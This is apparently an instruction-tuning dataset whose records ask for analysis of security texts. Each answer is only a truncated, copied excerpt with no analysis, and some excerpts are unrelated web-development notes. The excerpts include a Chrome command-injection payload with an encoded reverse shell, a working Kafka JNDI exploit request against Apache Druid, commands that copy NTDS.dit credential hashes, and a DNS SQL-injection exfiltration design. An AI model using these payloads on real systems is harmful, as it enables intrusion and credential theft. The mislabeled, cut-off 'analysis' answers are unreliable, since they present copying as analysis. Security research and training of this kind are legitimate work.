{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Binary Gauntlet 0 Category: Binary Exploitation, 10 points ## Description > This series of problems has to do with binary protections and how they affect a very simple program. How far can you make it in the gauntlet? A binary file was attached. ## Solution Let's run `checksec` on the file: ```console (user@kali)-[/media/sf_CTFs/pico/Binary_Gauntlet_0] $ checksec --file=gauntlet [*] '/media/sf_CTFs/pico/Binary_Gauntlet_0/gauntlet' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments ``` We can see that there are virtually no protections for this program. Using Ghidra, we can check the decompiled output of the program: ```c void sigsegv_handler(void) { fprintf(stderr,\"%s\\n\",flag); fflush(stderr); /* WARNING: Subroutine does not return */ exit(1); } undefined8 main(void) { char local_88 [108]; __gid_t local_1c; FILE *local_18; char *local_10; local_10 = (char *)malloc(1000); local_18 = fopen(\"flag.txt\",\"r\"); if (local_18 == (FILE *)0x0) { puts( \"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are runningthis on the shell server.\" ); /* WARNING: Subroutine does not return */ exit(0); } fgets(flag,0x40,local_18); signal(0xb,sigsegv_handler); local_1c = getegid(); setresgid(local_1c,local_1c,local_1c); fgets(local_10,1000,stdin); local_10[999] = '\\0'; printf(local_10); fflush(stdout); fgets(local_10,1000,stdin); local_10[999] = '\\0'; strcpy(local_88,local_10); return 0; } ``` We can see that the program sets up a SIGSEGV handler, which gets called when a segmentation fault occurs. Conveniently, this handler just prints the flag. So all we need to do is cause a segmentation fault. Notice how the program reads up to 1000 characters from the standard input via `fgets(local_10,1000,stdin)`, then calls `strcpy(local_88,local_10)` to copy the input to a much shorter local variable: `char local_88 [108]`. Therefore, if we provide an input somewhat longer than `108`, we'll ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot Jeffxx #BHUSA @BLACKHATEVENTS Jeff Chao (Jeffxx)  Researcher at TrapaSecurity  Ex-senior Researcher at TeamT5  Member of HITCON CTF Team  Member of Chroot  Focus on Mobile and IoT Vulnerabilities AGENDA 01 02 03 04 05 Samsung Security Framework - Knox Related Work Vulnerabilities in Secure Boot Demo After Code Execution on S-boot Demo Video Samsung Security Framework Knox Knox - Root of Trust Knox  Trusted Boot  Hardware PBL  Verify secure boot(S-Boot) & load  S-Boot  Set handler for Monitor mode, drop privilege  Request EL3 to initial TEEOS  Verify & Load Hypervisor (uh.bin)  Verify & Load Kernel (boot.img)  Kernel with DM-Verity  Verify system.img & mount  Verify vendor.img & mount Knox bit (warranty bit)  One-time fuse, cant restore  Blow the fuse when trying to boot a custom image and prevent further booting Sensitive Data Protection  The storage (Sensitive Data) is encrypted when the device is locked  Encrypted Keys are stored in trustzone Sensitive Data Protection cont  Some critical information can only be decrypted by trustlet ARM Trustzone Non-secure World User Mode Kernel Mode Hypervisor Mode Secure World User Mode Kernel Mode Monitor Mode EL0 EL1 EL2 EL3 Related Work BH17  Defeating Samsung KNOX with zero privilege by returnsme  EL0 -> EL1 Non-secure World User Mode Kernel Mode Hypervisor Mode Secure World User Mode Kernel Mode Monitor Mode EL0 EL1 EL2 EL3 BH17 EU - How Samsung Secures Your Wallet by Tencent Lab  EL0 -> Secure EL0 (kinibi) Non-secure World User Mode Kernel Mode Hypervisor Mode Secure World User Mode Kernel Mode Monitor Mode EL0 EL1 EL2 EL3 BH19  Breaking Samsungs Arm Trustzone  EL0 -> Secure-EL3 (kinibi, S8 and before) Non-secure World User Mode Kernel Mode Hypervisor Mode Secure World User Mode Kerne Mode Monitor Mode EL0 EL1 EL2 EL3 What if the device is turned off & we dont know the passcode? In this talk  out-side the box(locked phone) -> Non-Secure EL1 Non-secure World U", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Crypto 400 (crypto, 400p) ### PL [ENG](#eng-version) Dostajemy cztery ciphertexty, oraz trzy odpowiadające im plaintexty. W czwartym ciphertexcie znajduje się flaga, i naszym zadaniem jest odzyskać ją: ```python inp0 = \"People don't understand computers. Computers are magical boxes that do things. People believe what computers tell them.\" out0 = \"a2ccb5e4a4f694bd8a87cec3679d69a87db401a4199006dbb0ccbfe6a7ecc3e4f7b2e426c53fed35f95fe3498d038bebdbadeabce9cdfecf87968776876be12088228041c951730a7a30702e197802372236c03dc443934bef55ee71e03f423f7e213715360c1e060aec10fa7ea57ad36f94069f066c50\".decode(\"hex\") inp1 = \"There are two types of encryption: one that will prevent your sister from reading your diary and one that will prevent your government.\" out1 = \"2e4d3e6d2433102f12514b45ae01ef33f32d9869da5b891177076b3b7f34172d237224ca28da588151f349b023a5335a6a0155014b69557c343e2fd3358a538f3c8330a36ffe8eec999ac69abf94a7acbbe01fe108dd4f96378529b96df397e6e6a2fadeb2919b979b38c131f93aa015b709990d9fecdebafdbbf79ead9d819163867db97bb854\".decode(\"hex\") inp2 = \"There's an entire flight simulator hidden in every copy of Microsoft Excel 97.\" out2 = \"fa99eab9f0e0d1bc8588c6da30cb38ef3aa101bc0989139ab2d2a5e1a0f3d8f9f6efb950b54680489e7dda6da923afcfadcfc99bc8ffd4a9aebbe521dc20f82291358510dc6e147a074846463554\".decode(\"hex\") out3 = \"b4d0b1b0e5bd8ae7cdcbc4d139cf75b173ad4bfb0787008ff2cdf3bffda783f6fff2a44ba81fd61edf3c853daa65ea9ce99690d586e1dee2e1f7a949a916d50dbd19bc2eab3e50380e0d7a2c1d205a59455fbe0ffa2ea63b9074ce43d11e715d495401235f693e31289b2c8d198158f81ba471b32917644e\".decode('hex') inp = [inp0, inp1, inp2] out = [out0, out1, out2, out3] ``` Nie wiemy w jaki sposób zostały zaszyfrowane te dane, musimy więc uciec sie do kryptoanalizy. Jako podpowiedź, w treści zadania otrzymaliśmy informację że szyfr nie używa żadnego klucza. Pierwszą rzeczą jaką zauważamy, jest bardzo specyficzny rozkład najwyższego bitu wiadomości: ```python for i in range(len(out)): o = out[i] print ''.join('1' if ord(oc)&0x80 !=", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOut-of-Band File Transfer on Closed Systems An Insiders Options Michael Rich @miketofet mike@tofet.net Abstract I present a method of transferring arbitrary binary files to and from an ostensibly closed system using standard office software and readily available office tools while avoiding the use of Internet access or magnetic media. These methods are available to any determined insider. Though the methods are not perfect, I used the techniques presented here in a successful proof-of-concept to deliver a selection of PowerSploit tools to an otherwise clean machine. The Challenge One day I was examining an internal information portal at work and discovered that the system was using client-side data validation to prevent XSS attacks. This sort of security method is very easy to circumvent by using standard penetration testing tools such as TamperData or Burp Suite. I really wanted to see what would happen if I could get the XSS test through to the server. But, I was on a closed system and not at liberty to install software even if I could download those tools. At first I tried to find a way to forge the POST call on my work machine. This machine was your basic Windows box with a desktop full of standard office suites. I identified a couple of candidate options but I was soon distracted by the more generic question: How can I install those tools that I want to use without alerting anyone? By alerting anyone I mean avoiding those methods that have been specifically secured and monitored on a high-value, closed network. Without going into detail, this generally precludes the use of any magnetic media or connecting to unapproved web or Internet resources. I consider any path that delivers arbitrary data without triggering an alert on established monitoring systems to be considered out-of-band. Disclaimer Lest my network admins at work have a heart attack and revoke my access, let me be clear: I conceived of the idea at work but did all my development and testing on my ho", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Link Link组件用于取代`<a>`元素生成一个链接允许用户点击后跳转到另一个路由 它基本上就是`<a>`元素的React 版本可以接收Router的状态 ### 使用时需要先引用组件 ```js import { Link } from 'react-router-dom' ``` ### 写入跳转地址 ```js <Link exact to=\"/about\">About</Link> //tostring链接到的路径名或位置 //exact 严格匹配 ``` ### 可以`to`一个`location`对象 ```js <Link to={ { pathname: '/courses', //URL的路径 search: '?sort=name', //URL查询字符串 hash: '#the-hash', //URL哈希片段 state: { fromDashboard: true } // state使用时作为一个对象可以设置位置特定的状态 //对象内可以自己写内容 } }/> ``` ### NavLink > `<NavLink>`是可以添加样式的 Link ##### `<NavLink>`直接添加样式给名为`active`的`class`添加样式 ##### 可以给NavLink添加className ```js <NavLink to=\"/faq\" activeClassName=\"selected\" >FAQs</NavLink> ``` ##### 可以给NavLink添加activeStyle: object ```js <NavLink to=\"/faq\" activeStyle={ { fontWeight: 'bold', color: 'red' } } >FAQs</NavLink> ``` ### Redirect `Redirect`重定向<Redirect> 渲染时将导航到一个新地址这个新地址覆盖在访问历史信息里面的本该访问的那个地址 ```js <Switch> <Redirect from='/old-path' to='/new-path'/> //from 原来的地址 //to 需要跳转的地址 <Route path='/new-path' component={Place}/> </Switch> ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYour site here LOGO 移动APP风险防护与安全测评 Android平台 Your site here LOGO 移动APP风险防护  前言  APP面临的安全威胁  APP加固  APP原理  APP反编译保护  APP反汇编保护  APP防篡改保护  APP防调试与注入保护  APP脱壳攻击测试 Your site here LOGO 前言 Android开发者常常面临的一个问题就是防破解 防二次打包现如今安全问题越来越重要越来越多 的Android开发者也开始寻求安全的保护方案 Your site here LOGO APP面临的安全威胁 盗版数据篡改山寨 Your site here LOGO APP面临的安全威胁  盗版  代码修改(广告植入移除)  资源修改(界面替换广告页面链接篡改)  破解(解除应用付费)  篡改应用数据(游戏金币篡改)  挂马添加恶意代码以及病毒(隐私窃取交易篡改 等) Your site here LOGO APP面临的安全威胁  数据篡改  动态注入:数据监听拦截窃取修改  本地数据修改数据库文件修改  服务器欺骗向服务器发送假数据 Your site here LOGO APP面临的安全威胁  山寨  应用名称复制或模仿  应用图标复制或模仿  应用内容复制或模仿 Your site here LOGO APP风险防护技术  加固 为了加强APP安全性越来越多的开发者选择APP加固方案对 APP进行加固保护来防止二次打包盗版数据篡改等风险 APP加固基本服务  防止逆向分析 加密app代码阻止反编译  防止二次打包 对app完整性校验保护防止盗版  防止调试及注入 阻止动态调试注入防止外挂木马窃取账号密码修改交易金额等  防止应用数据窃取 加密应用敏感数据防止泄漏  防止木马病毒 监测设备环境防止木马病毒恶意应用或钓鱼攻击 Your site here LOGO APP加固厂商介绍 目前国内App加固厂商较多其中以专业从事加固为主打产品 的厂商有:爱加密娜迦(nagain) 梆梆通付盾等 Your site here LOGO APP加固技术原理以及发展现状 目前加固技术主要分为一代和二代 一代(1.0)加固方案 1.0的方案是基于类加载的技术原理:对classes.dex文件进 行完整加密另存为文件放入资源文件中通过壳代码(壳dex)进 行载入并解密运行 二代(2.0)加固方案 2.0的方案是基于方法替换方式原理:将原dex中的所有方法 的代码提取出来进行加密运行时动态劫持Dalvik虚拟机中解析 方法的代码将解密后的代码交给虚拟机执行引擎 Your site here LOGO 各厂商APP加固技术 加固技术 加固原理 加固厂商 类加载技术 (1.0) 对原classes.dex文件进行完整加 密另存为文件放入资源文件中 通过壳代码(壳dex)进行载入并解 密运行 娜迦爱加 密梆梆 网秦等 对原dex文件整体压缩加密保存 在壳代理的dex文件尾部加载到 内存中解密运行 360 方法替换技 术(2.0) 将原classes.dex中的所有方法的 代码提取出来单独加密,运行时动 态劫持Dalvik虚拟机中解析方法的 代码将解密后的代码交给虚拟机 执行引擎 娜迦梆梆 Your site here LOGO 各厂商APP加固识别 各加固厂商采用的加固保护核心库大致如下存放在lib目录或 assets目录 加固厂商 加固保护核心库 娜迦 1.0(libchaosvmp.so)2.0(libddog.solibfdog.so) 爱加密 libexec.solibexecmain.so 梆梆 1.0(libsecexe.solibsecmain.so)2.0(libDexHelper.so) 360 libprotectClass.solibjiagu.so 通付盾 libegis.so 网秦 libnqshield.so 百度 libbaiduprotect.so 腾讯 libtup.so 阿里 libmobisec.so Your site here LOGO APP加固必要性 Android平台应用采用Java语言进行开发由于 Java语言很容易被反编译反编译后的代码接近源代 码的级别易读性极高容易暴露客户端的所有逻辑 比如与服务端的通讯方式加解密算法密钥转账业 务流程软键盘技术实现等等 因此很有必要对Java 代码进行加密保护即采用加固方案 Your site here LOGO APP加固  反编译保护 JAVA层保护 Android平台采用使用Java作为原生语言进行开发在最终的安装包中 所有的java代码编译并打包到APK中的classes.dex文件中java代码的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom PIL import Image import sys, math nice = [] for f in range(464): im = Image.open(\"tv/out-\"+str(f)+\".png\") pix = im.load() for y in range(200): for x in range(200): if(pix[y, x] != 0 and pix[y, x] != 0xff): if(f not in nice): nice.append(f) print(nice)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nchromemaclinux 0x00 chrome chrome RCE maclinux --gpu-launcher bashshell Windowspoccmd Linux Linuxchrome touchchrometouch bash 0x01 --gpu-launcher chrome --gpu-launcher= --utility-cmd-prefix= --renderer-cmd-prefix= sandbox cc --gpu-launcher Chromium gpu-launcher renderer-cmd-prefix 1. gpu-launchergpu 2. renderer-cmd-prefix--user-data-dir chrome 1. renderer-cmd-prefix 2. gpu-launcherutility-cmd-prefixrenderer-cmd-prefix 3. gpu-lancher --utility-cmd-prefix gpu macLinuxWindows 0x02 --utility-cmd-prefix payload ls -l /Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --no-sandbox --utility-cmd-prefix='ls -l' 1. chromels 2. 3. ls -l ls shell ls -l && pwd ls+bash bash -cbash bash -c 'ls -l' bash -c 'ls' command not found chrome -cbash -c bash -c 'ls'chrome --utility-cmd-prefix+ chrome bash -c \"ls -l\" bash -c '\"ls -l\"' '--nosandbox' '--xxxxxx' bash () 0x03 ->-> bash -c \"ls -l\" ls -l bash -cbash payload bash -c ls&&id //&&shell shell bash -c ls${IFS}-l //shell${IFS} bingobashshell shellubuntu pythonphpsshbashbashshell chromium --no-sandbox --utility-and-browser --utility-cmd-prefix='/bin/sh -c echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xM jcuMC4wLjEvODA4MCAwPiYx|base64${IFS}-d>reverse;bash${IFS}reverse base64bashshell 0x04 argvargv", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDNS Data Exfiltration Using SQL Injection Bob Ricks G2, Inc. SQL Injection  We assume knowledge of how it works  Basic types of data exfiltration  Verbose  Displayed on page  Error based  Blind  Timing  HTTP Request  Change in page  DNS Exfiltration Related Work on DNS Exfiltration  http://pentestmonkey.net/blog/m ssql-dns/  David Litchfield: The Oracle Hacker's Handbook: Hacking and Defending Oracle  Squeeza (http://www.sensepost.com/rese arch/squeeza/dc-15- Attacking Oracle  Because its there, and out there  Most of the DNS Exfiltration tools attack MS-SQL Server  Until Oracle 11g, access to UTL_INADDR defaulted to on and unprotected. Access to UTL_HTTP defaults to on, but Oracle recommends turning it off unless needed. Why we are here  DNS is Usually available  HTTP connections should be blocked  There is usually a DNS path available  Even if the database has no outbound comms  DNS server for DMZ will probably forward requests  Speed  Timing/change in page extract ~1 bit per injection  Completeness  Non-standard table and column names  Data types What we built  Tool to exfiltrate arbitrary data from Oracle  Automatically generates injection strings  Receives and processes DNS queries  Asks for additional information based on responses from the database Our Design  Submit a number of queries in each round  We know from the position in the DNS request which subquery each field matches  Can configure how many subqueries and maximum length of each return value  Random characters plus query number  Use a short domain name, xg2.us  e.g. 0414243.DATABASE.sal0.xg2.us What we learned  DNS Restrictions  Total size 248 characters, including overhead  Require use of entire domain, own domain name  Each field needs to be 1-63 characters  Each subquery must return 1 column and 1 row How we process data types  RAW  Uses approximately twice as many characters  Nothing has to be changed, all chars valid  Character strings  Good if all characters and numbers  Need conversion if th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCovert Channels in TCP and IP Headers Drew Hintz drew@overt.org http://guh.nu Drew Hintz - http://guh.nu - 2 At A Glance  Who are you? Who are they?  Definitions  Analysis of some covert channels  Attack against timestamp covert channel  Detection and prevention  New covert channel tool Drew Hintz - http://guh.nu - 3 Who Are You?  Need to communicate covertly, but typical encryption is not the complete solution.  Why not just encrypt?  Encryption may be outlawed  Key escrow may be mandatory  US & UK Government  Might raise too many eyebrows  Thrown in jail in China  Employer may question what you are doing  Malicious code command and control Drew Hintz - http://guh.nu - 4 Who are they?  Casual Observer  Watching everyone  Automated systems sifting on keywords  Can only keep minimal state on traffic  Dedicated Observer  Looking specifically at a few suspect people  All portions of traffic closely monitored  Many resources available, can easily keep state Drew Hintz - http://guh.nu - 5 How covert is covert enough?  Semi-Covert: Fooling the Casual Observer  If examined, traffic appears unusual  Assumes they wont bother looking  Detecting it requires a low to moderate amount of work  Truly Covert: Fooling Everyone  Traffic appears completely normal  Will work even if they know the procedure used  Detecting it is as hard as breaking the underlying cryptography Drew Hintz - http://guh.nu - 6 Two Types of Covert Channels  Extra communication to a host  Hiding the fact that youre even communicating with a host Drew Hintz - http://guh.nu - 7 Extra Communication to a Host  Useful when you must hide the fact that youre encrypting data  Method  Uses some amount of cover/permissible traffic  Sender embeds covert message outbound  Receiver gets traffic as normal  Receiver analyzes traffic, retrieves message Drew Hintz - http://guh.nu - 8 Finding a Good Covert Channel  First find a place that random data is being transmitted naturally  Ex. Initial Sequence Numbers, complex timing ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194) Apache Kafka是一个开源分布式消息队列Kafka clients是相对应的Java客户端 在版本3.3.2及以前Apache Kafka clients中存在一处JNDI注入漏洞如果攻击者在连接的时候可以控制属性`sasl.jaas.config`的值为`com.sun.security.auth.module.JndiLoginModule`则可以发起JNDI连接进而导致JNDI注入漏洞执行任意命令 由于这个漏洞是存在于Java库kafka-clients中所以我们需要在真实环境下找到使用了这个库的软件且用户可以控制连接参数 这个软件就是Apache Druid其使用kafka-clients来连接Kafka作为其数据源之一这篇指南就来演示如何利用CVE-2023-25194来攻击Apache Druid 参考链接 - <https://nvd.nist.gov/vuln/detail/CVE-2023-25194> - <https://github.com/projectdiscovery/nuclei-templates/blob/5d90e8275084b0ae9166ec38cacd22e5a5a94fb8/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml> - <https://hackerone.com/reports/1529790> ## 漏洞环境 执行如下命令启动一个Apache Druid 25.0.0服务其内部使用的kafka-clients版本是3.3.1 ``` docker compose up -d ``` 服务启动后访问`http://your-ip:8888`即可查看到Apache Druid主页 ## 漏洞复现 首先使用[JNDIExploit](https://github.com/vulhub/JNDIExploit)启动一个恶意的JNDI服务器 ![](1.png) 可见这个工具给出了很多利用方法我们使用`ldap://roguo-jndi-server:1389/Basic/Command/Base64/[base64_encoded_cmd]`将命令`id > /tmp/success`编码后放在URL中 将这个恶意LDAP URL放在下面这个请求中并发送 ``` POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 Host: your-ip:8888 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Type: application/json Content-Length: 1792 { \"type\":\"kafka\", \"spec\":{ \"type\":\"kafka\", \"ioConfig\":{ \"type\":\"kafka\", \"consumerProperties\":{ \"bootstrap.servers\":\"127.0.0.1:6666\", \"sasl.mechanism\":\"SCRAM-SHA-256\", \"security.protocol\":\"SASL_SSL\", \"sasl.jaas.config\":\"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\\"ldap://roguo-jndi-server:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M=\\\" useFirstPass=\\\"true\\\" serviceName=\\\"x\\\" debug=\\\"true\\\" group.provider.url=\\\"xxx\\\";\" }, \"topic\":\"test\", \"useEarliestOffset\":true, \"inputFormat\":{ \"type\":\"regex\", \"pattern\":\"([\\\\s\\\\S]*)\", ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# GO --- **推荐工具/资源书籍** - [Go - Visual Studio Marketplace](https://marketplace.visualstudio.com/items?itemName=ms-vscode.Go) - [GoLand: A Clever IDE to Go by JetBrains](https://www.jetbrains.com/go/) - [re4lity/Hacking-With-Golang](https://github.com/re4lity/Hacking-With-Golang) - Golang安全资源合集 - [Quorafind/golang-developer-roadmap-cn](https://github.com/Quorafind/golang-developer-roadmap-cn) - Go 开发者路线图 --- ## 常见报错 - **fatal error: cant find import: fmt** 说明你的环境变量没有配置正确 --- ## IDE ### vscode - [在VsCode中搭建Go开发环境手把手教你配置](https://juejin.im/post/5cdd811fe51d45475d5e8e0c) ### Goland 常用快捷键 **文件操作相关** - `Ctrl + E` 打开最近浏览过的文件 - `Ctrl + N` 快速打开某个 struct 结构体所在的文件 - `Ctrl + Shift + N` 快速打开文件 - `Shift + F6` 重命名文件夹文件方法变量名等 **代码格式化相关** - `Ctrl + Alt + L` 格式化代码 - `Ctrl + 空格` 代码提示 - `Ctrl + /` 单行注释 - `Ctrl + Shift + /` 多行注释 - `Ctrl + B 或 F4` 快速跳转到结构体或方法的定义位置(需将光标移动到结构体或方法的名称上) - `Ctrl + \"+ 或 -\"` 可以将当前(光标所在位置)的方法进行展开或折叠 **查找和定位相关** - `Ctrl + R` 替换文本 - `Ctrl + F` 查找文本 - `Ctrl + Shift + F` 全局查找 - `Ctrl + G` 显示当前光标所在行的行号 - `Ctrl + Shift + Alt + N` 查找类中的方法或变量 **编辑代码相关** - `Ctrl + J` 快速生成一个代码片段 - `Shift+Enter` 向光标的下方插入一行,并将光标移动到该行的开始位置 - `Ctrl + X` 删除当前光标所在行 - `Ctrl + D` 复制当前光标所在行 - `Ctrl + Shift + 方向键上或下` 将光标所在的行进行上下移动(也可以使用 Alt+Shift+方向键上或下) - `Alt + 回车` 自动导入需要导入的包 - `Ctrl + Shift + U` 将选中的内容进行大小写转化 - `Alt + Insert` 生成测试代码 - `Alt + Up/Down` 快速移动到上一个或下一个方法 - `Ctrl + Alt + Space` 类名或接口名提示(代码提示) - `Ctrl + P` 提示方法的参数类型(需在方法调用的位置使用,并将光标移动至( )的内部或两侧) **编辑器相关** - `Ctrl + Alt + left/right` 返回至上次浏览的位置 - `Alt + left/right` 切换代码视图 - `Ctrl + W` 快速选中代码 - `Alt + F3` 逐个向下查找选中的代码,并高亮显示 - `Tab` 代码标签输入完成后,按 Tab,生成代码 - `F2 或 Shift + F2` 快速定位错误或警告 - `Alt + Shift + C` 查看最近的操作 - `Alt + 1` 快速打开或隐藏工程面板 --- ## 安装/配置/报错 ### 安装 **windows** 默认情况下 `.msi` 文件会安装在 `c:\\Go` 目录下.且环境变量自动配置好.`GOPATH` 变量请自己指定 **linux** ```bash 访问 https://golang.org/dl/ 下载最新版本包 tar -C /usr/local -xzf 相应文件.tar.gz export PATH=$PATH:/usr/local/go/bin export GOROOT=/usr/local/go export GOPATH=$HOME/Applications/Go source $HOME/.profile source ~/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 0x01 web swingsakurawebpandap webweb webweb uaf webidaida C++ webpwn sakuraweb 6 web SQLsqlitesqlite pwn smugglingssrf127.0.0.1redisSSRFpwnwebpwn 0x02 httpd.conf mpm_worker_module modules/mod_mpm_worker.so // auth_kerb_module modules/mod_auth_kerb.so //kerberos authn_core_module modules/mod_authn_core.so //httpbasicldap authz_user_module modules/mod_authz_user.so // authz_core_module modules/mod_authz_core.so // access_compat_module modules/mod_access_compat.so //ip auth_basic_module modules/mod_auth_basic.so //basic socache_shmcb_module modules/mod_socache_shmcb.so // reqtimeout_module modules/mod_reqtimeout.so // filter_module modules/mod_filter.so // deflate_module modules/mod_deflate.so // mime_module modules/mod_mime.so // env_module modules/mod_env.so //apache expires_module modules/mod_expires.so // headers_module modules/mod_headers.so // setenvif_module modules/mod_setenvif.so //cgi proxy_module modules/mod_proxy.so // ssl_module modules/mod_ssl.so //sslv3tls v1.x unixd_module modules/mod_unixd.so // dir_module modules/mod_dir.so // alias_module modules/mod_alias.so //aliasscriptalias rewrite_module modules/mod_rewrite.so //url LoadModule proxy_http_module modules/mod_proxy_http.so //http LoadModule svpn_web_module modules/mod_svpn_web.so //proxy twf_module modules/mod_twf.so mdm_module modules/mod_mdm.so regex_module modules/mod_regex.so mvcon_module modules/mod_mvcon.so comm_check_module modules/mod_comm_check.so // service_downgrade_module modules/mod_service_downgrade.so // proxymod_proxy.so ida patch review 0x03 lib liblibf5 liblibso soso 0x04", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1003-003-win-使用vssown.vbs获得NTDS.dit文件 ## 来自ATT&CK的描述 攻击者可能试图访问或创建Active Directory域数据库的副本以便窃取凭据信息以及获取有关域成员例如设备用户和访问权限的其他信息默认情况下NTDS文件NTDS.dit位于%SystemRoot%\\NTDS\\Ntds.dit域控制器中 除了在活动的域控制器上查找NTDS文件之外攻击者还可能搜索包含相同或相似信息的备份 下列工具和技术可用于枚举NTDS文件和整个Active Directory哈希的内容 - 卷影复制 - secretsdump.py - 使用内置的Windows工具ntdsutil.exe - 调用卷影副本 ### NTDS.dit Ntds.dit文件是存储Active Directory数据的数据库包括有关用户对象组和组成员身份的信息它包括域中所有用户的密码哈希值域控制器DC上的ntds.dit文件只能由可以登录到DC的用户访问很明显保护这个文件至关重要因为攻击者访问这个文件会导致整个域沦陷 **默认情况下NTDS文件将位于域控制器的SystemRoot\\NTDS\\Ntds.dit中**但通常存储在其他逻辑驱动器上AD数据库是一个Jet数据库引擎它使用可扩展存储引擎ESE提供数据存储和索引服务通过ESE级别索引可以快速定位对象属性 ## 测试案例 在2016+域控上使用 ntdsutil snapshot mount导出ntds.dit ### 创建快照 ```dos cscript vssown.vbs /start cscript vssown.vbs /create c cscript vssown.vbs /list copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy11\\windows\\ntds\\ntds.dit C:\\ cscript vssown.vbs /delete ``` ## 检测日志 windows 安全日志 ## 测试复现 ```dos C:\\Users\\Administrator\\Desktop\\test>cscript vssown.vbs /start Microsoft (R) Windows Script Host Version 5.812 版权所有(C) Microsoft Corporation保留所有权利 [*] Signal sent to start the VSS service. C:\\Users\\Administrator\\Desktop\\test>cscript vssown.vbs /create c Microsoft (R) Windows Script Host Version 5.812 版权所有(C) Microsoft Corporation保留所有权利 [*] Attempting to create a shadow copy. C:\\Users\\Administrator\\Desktop\\test>cscript vssown.vbs /list Microsoft (R) Windows Script Host Version 5.812 版权所有(C) Microsoft Corporation保留所有权利 SHADOW COPIES ============= [*] ID: {42C8E0BD-6FD9-4CFB-B006-4640DAE84DC8} [*] Client accessible: True [*] Count: 1 [*] Device object: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1 [*] Differential: True [*] Exposed locally: False [*] Exposed name: [*] Exposed remotely: False [*] Hardware assisted: False [*] Imported: False [*] No auto release: True [*] Not surfaced: False [*] No writers: True [*] Originating machine: ICBC.abcc.org [*] Persistent: True [*] Plex: False [*] Provider ID: {B5946137-7B9F-4925-AF80-51ABD60B20D5} [*] Service machine: ICBC.abcc.org [*] Set ID: {584C48BF-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021 云安全联盟大中华区-版权所有 1 2021 云安全联盟大中华区-版权所有 2 目 录 一前 言..........................................................................................................................................5 二落地案例清单............................................................................................................................. 7 三落地案例......................................................................................................................................9 1安恒信息温州市大数据发展管理局零信任实践案例................................................................9 2任子行零信任安全防护解决方案护航海事局移动/远程办公安全........................................13 3奇安信零信任安全解决方案在部委大数据中心的实践案例..................................................17 4吉大正元某大型集团公司零信任实践案例..............................................................................19 5格尔软件航空工业商网零信任安全最佳实践..........................................................................27 6厦门服云招商局零信任落地案例..............................................................................................36 7深信服山东港口集团零信任多数据中心安全接入..................................................................40 8杭州漠坦尼物联网零信任安全解决方案..................................................................................41 9易安联中国核工业华兴建设有限公司 EnSDP 零信任安界防护平台......................................44 10虎符网络国家电网某二级单位基于零信任架构的远程安全访问解决方案........................48 11奇安信某大型商业银行零信任远程访问解决方案................................................................54 12蔷薇灵动中国交通建设股份有限公司零信任落地解决方案................................................59 13缔盟云中国建设银行零信任落地案例....................................................................................67 14联软科技光大银行零信任远程办公实践................................................................................70 15云深互联阳光保险集团养老与不动产中心零信任落地案例................................................74 16上海云盾贵州白山云科技股份有限公司应用可信访问........................................................78 17天谷信息 e 签宝零信任实践案例............................................................................................84 18北京芯", "category": "text_analysis", "source": "security_papers"}
